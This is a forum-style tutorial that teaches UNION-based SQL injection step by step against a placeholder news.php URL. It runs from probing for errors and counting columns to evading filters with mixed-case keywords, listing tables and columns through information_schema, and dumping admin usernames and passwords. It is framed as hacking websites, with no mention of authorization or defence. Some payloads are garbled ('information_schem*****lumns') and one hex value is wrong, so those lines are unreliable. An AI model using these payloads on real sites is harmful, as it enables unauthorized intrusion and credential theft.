You need to know SQL, Before start reading this guide.
If you dont know SQL go
Here, and start learning.
SQL Injections.
Chapter 1 - What is SQL Injection?.
SQL Injection, is when you inject a SQL query to the SQL query that is already running.
And then, you can find from the errors information on the database and from the database.
Chapter 2 - Basic SQL Injection
Can you SQL Inject the Web-Site or not.
First lets get a Web-site:
Example:
Code:
http://website.com/news.php?id=1
You can see on the Web-Site above that its using the GET Method.
So the query will look something like this:
Code:
SELECT * FROM news WHERE id = 1
Now we will put a ' after the id=1:
Code:
http://website.com/news.php?id=1'
So now the query will look like this:
Code:
SELECT * FROM news WHERE id = 1'
And its obvious that this query will output an error, because thers no ' to close the query.
if you can't see an error or that something changed, it means you can't SQL Inject the Web-Site.
Checking the amount of the columns that the query pull out from the Web-Site.
First thing on the Injection, is to check how much columns the query pulls out from the Web-Site.
Just put "group by 1--" after the "id=1".
And then add + 1 till you see an error.
Example:
Code:
http://website.com/news.php?id=1 group by 1-- No error
http://website.com/news.php?id=1 group by 2-- No error
http://website.com/news.php?id=1 group by 3-- No error
http://website.com/news.php?id=1 group by 4-- No error
http://website.com/news.php?id=1 group by 5-- Error
That's mean the query pulls out 4 field's.
Check the displayd fields.
The query pulls out all the columns, but usually it display just few of them.
So now we will learn how to check which columns are displayd.
In order to do it, we will learn another command: UNION SELECT.
What the command do, is to add another row to the query.
Here we will not choose data from the table, we will insert data ourselves.
For this command, we counted how much columns the query request.
Now remember our goal now, is to check which columns are displayd and which columns are not.
In order to do it, we will do two tricks.
1. We will replace the number that in "id" with "-1", this way nothing will be returnd.
2.We will not add values ranodmaly, we will add to each field an concecutive number, this way when we will see a number on the screen, we will know which field is displayd.
In this case we found 4 field's, so we will write the sentence below:
Code:
http://website.com/news.php?id=-1 union select 1,2,3,4--
As you noticed, we adding(Just in our screen, not to the real table) data to each field. We separate each field with an comma.
Now what is left for us, is to check which values we see on the screen. It doenst matter where, title, comment,name even if you see one number its enought!.
let's assume that you see the number 3. so we know that the 3rd field is displayd.
You will see why its useful...
Collecting information on the database.
Now we will start to collect information on the database, with two ways.
variable's and functions.
Variable: before its name, you put: @@.
Functions: After its name, you put: ().
*Important*
You can mix between capital letters and not capital letters.
Sometimes a specific word is blockd, just in capital letters or not capital letters.
So you just mixd between them, Example: @@VErSIoN.
Version: first thing to know when you hack a Web-Site, is the database version.
Ther's two ways to find it:
Code:
@@version
version()
The database name(Most Web-Sites uses more than one database):
The username that the query working on(Each of this functions, return the result):
Code:
user()
current_user()
system_user()
session_user()
Database path(Physical location of the server):
Temporary files folder path:
After we found that the 3rd field is displayd on the screen, we will write the code below:
Code:
http://website.com/news.php?id=-1 union select 1,2,version(),4--
Now, instead of seeing the number 3, we will see the database version.
Summary
In this chapter, we learnd how to check if the Web-Site can be SQL Inject or not.
And how to pull out information on the database.
Chapter 3 - Pulling out information from the database.
Introduction
Web-Sites that based on MySQL Version 5, have a table named "information_schema", that in it ther's information on all the databases,tables,columns.
Pulling out table names
Usually the first thing that you do after you know you can pull out information from the database, is to pull out all table names:
Code:
http://website.com/news.php?id=-1 union select 1,2,table_name,4 from information_schema.tables where table_schema=database()--
Lets explain the code:
We pulled out the column:"table_name", from the table:"tables", that in the database:"information_schema".
As you noticed, to pull out data from other databases,You write the database name.table name.
Since we wanted to get only tables from the current database, we did that he will pull out the tables in the condition(where) that the column table_schema is the same as the current database(database()).
At the end we puted a "--", to prevent an error incase the query have more parameters.
Where you write "--" in a query, it makes all the things after it a comment.
Ther's another two ways, to mark an comment: # and /*.
The command: Limit
At the last part, we explaind how to pull out a data from from the table, but the result that is displayd on the screen is just the name of the first table.
To display the name of the next table, we will use the command: Limit.
The command limit tells the query, which rows from which listing to display.
The command gets two parameters. from which row start displaying, and the amout of rows to display.
for example, you added Limit 5,10 to the query, you will make it display 10 rows that starts from the 6 row.
Why from the 6 row? because we start from 0, Example: 1 - second row(0,1), 5 - six row(0,1,2,3,4,5).
Lets notice that in our screen ther's just the 1 result(the first table), so if we wanna like pull out row number 6, we will write:
Code:
http://website.com/news.php?id=-1 union select 1,2,table_name,4 from information_schema.tables where table_schema=database() Limit 5,1--
The command:group_concat()
as opposed to Limit, the job of group_concat is to pull out all listings in one time:
Code:
http://website.com/news.php?id=-1 union select 1,2,group_concat(table_name, 0x3c62723e),4 from information_schema.tables where table_schema=database()--
In the brackets of the command, we put the name of the fields that we want to pull out, and we separate them with an comma.
The command group_concat, displays all the result without any space, so we added another "field" 0x3c62723e, so we cause that between the results there is a new line. becuase "3c62723e" is the HEX value of "<br />".
Remember: if you want to put an HEX value, remember to put a "0x" before it.
Example: 3c62723e = 0x3c62723e.
The disadvantage of group_concat is, that the command returns until 1024 characters. Like, if ther's 100 results, So from all the 100 we will get like 30.
but you can always use limit to pull the other 30.
Pull out column names
Ok, so we found the table user/admin, with:
Code:
http://website.com/news.php?id=-1 union select 1,2,group_concat(table_name, 0x3c62723e),4 from information_schema.tables where table_schema=database()--
So now we want to find the column names of that table(user/admin):
Code:
http://website.com/new.php?id=-1 union select 1,2,group_concat(column_name, 0x3c62723e),4 from information_schem*****lumns where table_name="admin" and table_schema=database()--
Three things has been changed:
1.The name of the column that we pull out.
2.The name of the table.
3.The condition.
Notice that we pull out all rows, in condition that the column table_name is equals to the string(The string we chose, is a name of a table) admin.
You need to put the string name between the qoutes, but sometimes it will display an error, so we need to change "admin" to the HEX value of it.
Just go to
GoogleBig - Encoder and Decoder Tool (Base64 - Hex - URL - Binary - Rot13 - Md5 - Sha1 - 1337)
And put on the first textbox "admin" (with the quotes).
Then Copy/Paste the HEX Value of it,and put it after table_name(Remember to had "0x" at the begining of the HEx Value).
Example: "admin" HEX Value= 5c2261646d696e5c22:
Code:
http://website.com/new.php?id=-1 union select 1,2,group_concat(column_name, 0x3c62723e),4 from information_schem*****lumns where table_name=0x5c2261646d696e5c22 and table_schema=database()--
Pulling out data
Ok, so imagine we found the table admin columns: username, password.
So now lets pull out the data:
Code:
http://website.com/news.php?id=-1 union select 1,2,group_concat(username, 0x3a, password,0x3c62723e),4 from admin--
So now we pulled out the columns username and password from the table admin.
What we will get?
A list of all admin's usernames and passwords.
You can notice that before, we writed database.table, but now because its the current database, we dont need to write database.table.
Pulling out all databases
Ok, now heres a code that will pull out all databases:
Code:
http://website.com/news.php?id=-1 union select 1,2,group_concat(schema_name, 0x3c62723e),4 from information_schema.schemata--
I think this code is very clear.
If you can't understand it, please read this guide 1 more time, till you can understand it.
MySQL database Version 4
In the MySQL databases version 4, ther isnt the database Information_schema.
So you will need to guess the table,columns. And its sucks...
Thats really all...
Hope this helpd ya! :]
Soz if i had some English mistakes, you can always fixs me.
-Zebra